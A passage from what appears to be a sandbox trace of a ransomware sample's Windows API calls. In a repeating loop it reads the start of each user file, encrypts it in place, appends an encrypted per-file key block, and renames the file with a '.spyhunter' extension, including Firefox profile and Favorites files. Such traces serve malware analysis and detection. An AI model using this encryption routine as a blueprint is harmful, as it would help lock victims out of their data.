ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1b4*=0x2800, lpOverlapped=0x0) returned 1 [0141.041] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.041] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1b4*=0x2800, lpOverlapped=0x0) returned 1 [0141.041] GetProcessHeap () returned 0x2c0000 [0141.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.041] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.041] WriteFile (in: hFile=0x158, lpBuffer=0x57f1f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1b4, lpOverlapped=0x0 | out: lpBuffer=0x57f1f4*, lpNumberOfBytesWritten=0x57f1b4*=0x4, lpOverlapped=0x0) returned 1 [0141.041] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1b4*=0x30, lpOverlapped=0x0) returned 1 [0141.041] CloseHandle (hObject=0x158) returned 1 [0141.041] GetProcessHeap () returned 0x2c0000 [0141.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3009ed8 [0141.041] wnsprintfW (in: pszDest=0x3009ed8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-bFAQxJ1OVDm-Wxss.m4a.spyhunter") returned 81 [0141.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-bFAQxJ1OVDm-Wxss.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-bfaqxj1ovdm-wxss.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-bFAQxJ1OVDm-Wxss.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-bfaqxj1ovdm-wxss.m4a.spyhunter")) returned 1 [0141.042] GetProcessHeap () returned 0x2c0000 [0141.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009ed8 | out: hHeap=0x2c0000) returned 1 [0141.042] GetProcessHeap () returned 0x2c0000 [0141.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.042] GetProcessHeap () returned 0x2c0000 [0141.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c812b8 | out: hHeap=0x2c0000) returned 1 [0141.042] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1f8 | out: pbBuffer=0x57f1f8) returned 1 [0141.042] GetProcessHeap () returned 0x2c0000 [0141.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.042] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1f0*=0x30) returned 1 [0141.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-35ZIU1VAgggLAe_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-35ziu1vaggglae_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-35ZIU1VAgggLAe_.jpg") returned 70 [0141.043] StrStrW (lpFirst="-35ZIU1VAgggLAe_.jpg", lpSrch=".txt") returned 0x0 [0141.043] GetProcessHeap () returned 0x2c0000 [0141.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.043] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1b4*=0x2800, lpOverlapped=0x0) returned 1 [0141.044] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.044] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1b4*=0x2800, lpOverlapped=0x0) returned 1 [0141.044] GetProcessHeap () returned 0x2c0000 [0141.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.044] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.044] WriteFile (in: hFile=0x158, lpBuffer=0x57f1f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1b4, lpOverlapped=0x0 | out: lpBuffer=0x57f1f4*, lpNumberOfBytesWritten=0x57f1b4*=0x4, lpOverlapped=0x0) returned 1 [0141.044] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1b4*=0x30, lpOverlapped=0x0) returned 1 [0141.044] CloseHandle (hObject=0x158) returned 1 [0141.044] GetProcessHeap () returned 0x2c0000 [0141.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3009ed8 [0141.044] wnsprintfW (in: pszDest=0x3009ed8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-35ZIU1VAgggLAe_.jpg.spyhunter") returned 80 [0141.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-35ZIU1VAgggLAe_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-35ziu1vaggglae_.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-35ZIU1VAgggLAe_.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-35ziu1vaggglae_.jpg.spyhunter")) returned 1 [0141.045] GetProcessHeap () returned 0x2c0000 [0141.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009ed8 | out: hHeap=0x2c0000) returned 1 [0141.045] GetProcessHeap () returned 0x2c0000 [0141.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.045] GetProcessHeap () returned 0x2c0000 [0141.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c811e0 | out: hHeap=0x2c0000) returned 1 [0141.050] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1e8 | out: pbBuffer=0x57f1e8) returned 1 [0141.050] GetProcessHeap () returned 0x2c0000 [0141.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.050] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1e0*=0x30) returned 1 [0141.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 109 [0141.051] StrStrW (lpFirst="extensions.sqlite", lpSrch=".txt") returned 0x0 [0141.051] GetProcessHeap () returned 0x2c0000 [0141.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.051] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1a4*=0x2800, lpOverlapped=0x0) returned 1 [0141.081] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.081] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1a4*=0x2800, lpOverlapped=0x0) returned 1 [0141.081] GetProcessHeap () returned 0x2c0000 [0141.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.081] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.081] WriteFile (in: hFile=0x158, lpBuffer=0x57f1e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1a4, lpOverlapped=0x0 | out: lpBuffer=0x57f1e4*, lpNumberOfBytesWritten=0x57f1a4*=0x4, lpOverlapped=0x0) returned 1 [0141.082] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1a4*=0x30, lpOverlapped=0x0) returned 1 [0141.082] CloseHandle (hObject=0x158) returned 1 [0141.090] GetProcessHeap () returned 0x2c0000 [0141.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.090] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.spyhunter") returned 119 [0141.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.spyhunter")) returned 1 [0141.090] GetProcessHeap () returned 0x2c0000 [0141.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.090] GetProcessHeap () returned 0x2c0000 [0141.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.091] GetProcessHeap () returned 0x2c0000 [0141.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0618 | out: hHeap=0x2c0000) returned 1 [0141.091] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1e8 | out: pbBuffer=0x57f1e8) returned 1 [0141.091] GetProcessHeap () returned 0x2c0000 [0141.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.091] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1e0*=0x30) returned 1 [0141.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.091] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0141.091] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".txt") returned 0x0 [0141.091] GetProcessHeap () returned 0x2c0000 [0141.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.091] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1a4*=0xe2, lpOverlapped=0x0) returned 1 [0141.092] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.092] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x57f1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1a4*=0xe2, lpOverlapped=0x0) returned 1 [0141.092] GetProcessHeap () returned 0x2c0000 [0141.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.092] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.092] WriteFile (in: hFile=0x170, lpBuffer=0x57f1e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1a4, lpOverlapped=0x0 | out: lpBuffer=0x57f1e4*, lpNumberOfBytesWritten=0x57f1a4*=0x4, lpOverlapped=0x0) returned 1 [0141.093] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1a4*=0x30, lpOverlapped=0x0) returned 1 [0141.093] CloseHandle (hObject=0x170) returned 1 [0141.093] GetProcessHeap () returned 0x2c0000 [0141.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.093] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.spyhunter") returned 81 [0141.093] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.spyhunter")) returned 1 [0141.094] GetProcessHeap () returned 0x2c0000 [0141.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.094] GetProcessHeap () returned 0x2c0000 [0141.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.094] GetProcessHeap () returned 0x2c0000 [0141.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81c00 | out: hHeap=0x2c0000) returned 1 [0141.094] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1e0 | out: pbBuffer=0x57f1e0) returned 1 [0141.094] GetProcessHeap () returned 0x2c0000 [0141.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.094] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1d8*=0x30) returned 1 [0141.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.097] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0141.097] StrStrW (lpFirst="Suggested Sites.url", lpSrch=".txt") returned 0x0 [0141.098] GetProcessHeap () returned 0x2c0000 [0141.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.098] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f19c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f19c*=0xec, lpOverlapped=0x0) returned 1 [0141.099] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.099] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x57f19c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f19c*=0xec, lpOverlapped=0x0) returned 1 [0141.099] GetProcessHeap () returned 0x2c0000 [0141.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.099] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.099] WriteFile (in: hFile=0x170, lpBuffer=0x57f1dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f19c, lpOverlapped=0x0 | out: lpBuffer=0x57f1dc*, lpNumberOfBytesWritten=0x57f19c*=0x4, lpOverlapped=0x0) returned 1 [0141.099] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f19c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f19c*=0x30, lpOverlapped=0x0) returned 1 [0141.099] CloseHandle (hObject=0x170) returned 1 [0141.100] GetProcessHeap () returned 0x2c0000 [0141.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.100] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.spyhunter") returned 79 [0141.100] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.spyhunter")) returned 1 [0141.100] GetProcessHeap () returned 0x2c0000 [0141.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.100] GetProcessHeap () returned 0x2c0000 [0141.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.100] GetProcessHeap () returned 0x2c0000 [0141.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80e80 | out: hHeap=0x2c0000) returned 1 [0141.100] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1e0 | out: pbBuffer=0x57f1e0) returned 1 [0141.100] GetProcessHeap () returned 0x2c0000 [0141.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.101] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1d8*=0x30) returned 1 [0141.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0141.101] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0141.101] GetProcessHeap () returned 0x2c0000 [0141.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.101] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f19c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f19c*=0x50, lpOverlapped=0x0) returned 1 [0141.102] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.102] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x57f19c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f19c*=0x50, lpOverlapped=0x0) returned 1 [0141.102] GetProcessHeap () returned 0x2c0000 [0141.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.102] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.102] WriteFile (in: hFile=0x170, lpBuffer=0x57f1dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f19c, lpOverlapped=0x0 | out: lpBuffer=0x57f1dc*, lpNumberOfBytesWritten=0x57f19c*=0x4, lpOverlapped=0x0) returned 1 [0141.102] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f19c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f19c*=0x30, lpOverlapped=0x0) returned 1 [0141.102] CloseHandle (hObject=0x170) returned 1 [0141.102] GetProcessHeap () returned 0x2c0000 [0141.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.103] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.spyhunter") returned 71 [0141.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.spyhunter")) returned 1 [0141.103] GetProcessHeap () returned 0x2c0000 [0141.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.103] GetProcessHeap () returned 0x2c0000 [0141.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.103] GetProcessHeap () returned 0x2c0000 [0141.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f340 | out: hHeap=0x2c0000) returned 1 [0141.103] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1d8 | out: pbBuffer=0x57f1d8) returned 1 [0141.103] GetProcessHeap () returned 0x2c0000 [0141.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.103] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1d0*=0x30) returned 1 [0141.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.104] GetProcessHeap () returned 0x2c0000 [0141.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.104] GetProcessHeap () returned 0x2c0000 [0141.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2668 | out: hHeap=0x2c0000) returned 1 [0141.104] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1d8 | out: pbBuffer=0x57f1d8) returned 1 [0141.104] GetProcessHeap () returned 0x2c0000 [0141.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.104] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1d0*=0x30) returned 1 [0141.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 